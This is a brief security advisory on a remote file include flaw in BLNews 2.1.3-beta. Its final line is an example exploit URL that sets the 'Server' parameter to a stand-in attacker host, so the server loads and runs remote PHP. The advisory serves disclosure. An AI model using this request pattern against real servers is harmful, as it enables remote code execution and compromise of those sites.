source: https://www.securityfocus.com/bid/7677/info
It has been reported that BLNews is prone to a remote file include vulnerability. This is due to the incorrection initilization of some PHP headers within the application. As a result, an attacker may be capable of executing arbitrary PHP commands within the context of the web server.
This vulnerability is said to affect BLNews version 2.1.3-beta, however other versions may also be affected.
http://www.example.org/admin/objects.inc.php4?Server=http://www.attacker.org
